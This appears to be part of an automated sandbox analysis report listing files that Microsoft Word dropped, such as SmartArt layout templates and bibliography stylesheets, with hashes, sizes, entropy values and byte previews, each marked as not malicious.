    SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
    SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
    Malicious:false
    Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):242
    Entropy (8bit):3.4938093034530917
    Encrypted:false
    SSDEEP:6:fxnxUX44lWWoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvToGHmD0+dAH/luWvv
    MD5:A6B2731ECC78E7CED9ED5408AB4F2931
    SHA1:BA15D036D522978409846EA682A1D7778381266F
    SHA-256:6A2F9E46087B1F0ED0E847AF05C4D4CC9F246989794993E8F3E15B633EFDD744
    SHA-512:666926612E83A7B4F6259C3FFEC3185ED3F07BDC88D43796A24C3C9F980516EB231BDEA4DC4CC05C6D7714BA12AE2DCC764CD07605118698809DEF12A71F1FDD
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
    Category:dropped
    Size (bytes):4888
    Entropy (8bit):7.8636569313247335
    Encrypted:false
    SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
    MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
    SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
    SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
    SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
    Malicious:false
    Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):260
    Entropy (8bit):3.494357416502254
    Encrypted:false
    SSDEEP:6:fxnxUX0XPE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPGHmD0+dAH/luWvv
    MD5:6F8FE7B05855C203F6DEC5C31885DD08
    SHA1:9CC27D17B654C6205284DECA3278DA0DD0153AFF
    SHA-256:B7F58DF058C938CCF39054B31472DC76E18A3764B78B414088A261E440870175
    SHA-512:C518A243E51CB4A1E3C227F6A8A8D9532EE111D5A1C86EBBB23BD4328D92CD6A0587DF65B3B40A0BE2576D8755686D2A3A55E10444D5BB09FC4E0194DB70AFE6
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.G.r.i.d...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
    Category:dropped
    Size (bytes):6193
    Entropy (8bit):7.855499268199703
    Encrypted:false
    SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
    MD5:031C246FFE0E2B623BBBD231E414E0D2
    SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
    SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
    SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
    Malicious:false
    Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):286
    Entropy (8bit):3.5502940710609354
    Encrypted:false
    SSDEEP:6:fxnxUXfQICl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXClNGHmD0wbnKYZAH/lMZqiv
    MD5:9B8D7EFE8A69E41CDC2439C38FE59FAF
    SHA1:034D46BEC5E38E20E56DD905E2CA2F25AF947ED1
    SHA-256:70042F1285C3CD91DDE8D4A424A5948AE8F1551495D8AF4612D59709BEF69DF2
    SHA-512:E50BB0C68A33D35F04C75F05AD4598834FEC7279140B1BB0847FF39D749591B8F2A0C94DA4897AAF6C33C50C1D583A836B0376015851910A77604F8396C7EF3C
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):270198
    Entropy (8bit):5.073814698282113
    Encrypted:false
    SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
    MD5:FF0E07EFF1333CDF9FC2523D323DD654
    SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
    SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
    SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
    Malicious:false
    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):288
    Entropy (8bit):3.523917709458511
    Encrypted:false
    SSDEEP:6:fxnxUXC1l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnySvNGHmD0wbnKYZAH/lMZqiv
    MD5:4A9A2E8DB82C90608C96008A5B6160EF
    SHA1:A49110814D9546B142C132EBB5B9D8A1EC23E2E6
    SHA-256:4FA948EEB075DFCB8DCA773A3F994560C69D275690953625731C4743CD5729F7
    SHA-512:320B9CC860FFBDB0FD2DB7DA7B7B129EEFF3FFB2E4E4820C3FBBFEA64735EB8CFE1F4BB5980302770C0F77FF575825F2D9A8BB59FC80AD4C198789B3D581963B
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.i.c.a.g.o...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):296658
    Entropy (8bit):5.000002997029767
    Encrypted:false
    SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
    MD5:9AC6DE7B629A4A802A41F93DB2C49747
    SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
    SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
    SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
    Malicious:false
    Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):238
    Entropy (8bit):3.472155835869843
    Encrypted:false
    SSDEEP:6:fxnxUXGE2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny4GHmD0+dAH/luWvv
    MD5:2240CF2315F2EB448CEA6E9CE21B5AC5
    SHA1:46332668E2169E86760CBD975FF6FA9DB5274F43
    SHA-256:0F7D0BD5A8CED523CFF4F99D7854C0EE007F5793FA9E1BA1CD933B0894BFBD0D
    SHA-512:10BA73FF861112590BF135F4B337346F9D4ACEB10798E15DC5976671E345BC29AC8527C6052FEC86AA7058E06D1E49052E49D7BCF24A01DB259B5902DB091182
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .r.i.n.g.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft OOXML
    Category:dropped
    Size (bytes):5151
    Entropy (8bit):7.859615916913808
    Encrypted:false
    SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
    MD5:6C24ED9C7C868DB0D55492BB126EAFF8
    SHA1:C6D96D4D298573B70CF5C714151CF87532535888
    SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
    SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
    Malicious:false
    Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):252
    Entropy (8bit):3.4680595384446202
    Encrypted:false
    SSDEEP:6:fxnxUXivlE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyydGHmD0+dAH/luWvv
    MD5:D79B5DE6D93AC06005761D88783B3EE6
    SHA1:E05BDCE2673B6AA8CBB17A138751EDFA2264DB91
    SHA-256:96125D6804544B8D4E6AE8638EFD4BD1F96A1BFB9EEF57337FFF40BA9FF4CDD1
    SHA-512:34057F7B2AB273964CB086D8A7DF09A4E05D244A1A27E7589BDC7E5679AB5F587FAB52A2261DB22070DA11EF016F7386635A2B8E54D83730E77A7B142C2E3929
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .a.r.c.h.i.t.e.c.t.u.r.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft OOXML
    Category:dropped
    Size (bytes):5783
    Entropy (8bit):7.88616857639663
    Encrypted:false
    SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
    MD5:8109B3C170E6C2C114164B8947F88AA1
    SHA1:FC63956575842219443F4B4C07A8127FBD804C84
    SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
    SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
    Malicious:false
    Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):246
    Entropy (8bit):3.5039994158393686
    Encrypted:false
    SSDEEP:6:fxnxUX4f+E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvGHmD0+dAH/luWvv
    MD5:16711B951E1130126E240A6E4CC2E382
    SHA1:8095AA79AEE029FD06428244CA2A6F28408448DB
    SHA-256:855342FE16234F72DA0C2765455B69CF412948CFBE70DE5F6D75A20ACDE29AE9
    SHA-512:454EAA0FD669489583C317699BE1CE5D706C31058B08CF2731A7621FDEFB6609C2F648E02A7A4B2B3A3DFA8406A696D1A6FA5063DDA684BDA4450A2E9FEFB0EF
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.b.e.d.A.r.c...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
    Category:dropped
    Size (bytes):3683
    Entropy (8bit):7.772039166640107
    Encrypted:false
    SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
    MD5:E8308DA3D46D0BC30857243E1B7D330D
    SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
    SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
    SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
    Malicious:false
    Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):292
    Entropy (8bit):3.5026803317779778
    Encrypted:false
    SSDEEP:6:fxnxUXC89ADni8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyf9ADiNGHmD0wbnKYZAH/lMZqiv
    MD5:A0D51783BFEE86F3AC46A810404B6796
    SHA1:93C5B21938DA69363DBF79CE594C302344AF9D9E
    SHA-256:47B43E7DBDF8B25565D874E4E071547666B08D7DF4D736EA8521591D0DED640F
    SHA-512:CA3DB5A574745107E1D6CAA60E491F11D8B140637D4ED31577CC0540C12FDF132D8BC5EBABEA3222F4D7BA1CA016FF3D45FE7688D355478C27A4877E6C4D0D75
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.t.i.t.l.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):251032
    Entropy (8bit):5.102652100491927
    Encrypted:false
    SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
    MD5:F425D8C274A8571B625EE66A8CE60287
    SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
    SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
    SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
    Malicious:false
    Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):254
    Entropy (8bit):3.4845992218379616
    Encrypted:false
    SSDEEP:6:fxnxUXQFoElh/lE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8lLGHmD0+dAH/luWvv
    MD5:E8B30D1070779CC14FBE93C8F5CF65BE
    SHA1:9C87F7BC66CF55634AB3F070064AAF8CC977CD05
    SHA-256:2E90434BE1F6DCEA9257D42C331CD9A8D06B848859FD4742A15612B2CA6EFACB
    SHA-512:C0D5363B43D45751192EF06C4EC3C896A161BB11DBFF1FC2E598D28C644824413C78AE3A68027F7E622AF0D709BE0FA893A3A3B4909084DF1ED9A8C1B8267FCA
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .H.e.x.a.g.o.n.R.a.d.i.a.l...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft OOXML
    Category:dropped
    Size (bytes):6024
    Entropy (8bit):7.886254023824049
    Encrypted:false
    SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
    MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
    SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
    SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
    SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
    Malicious:false
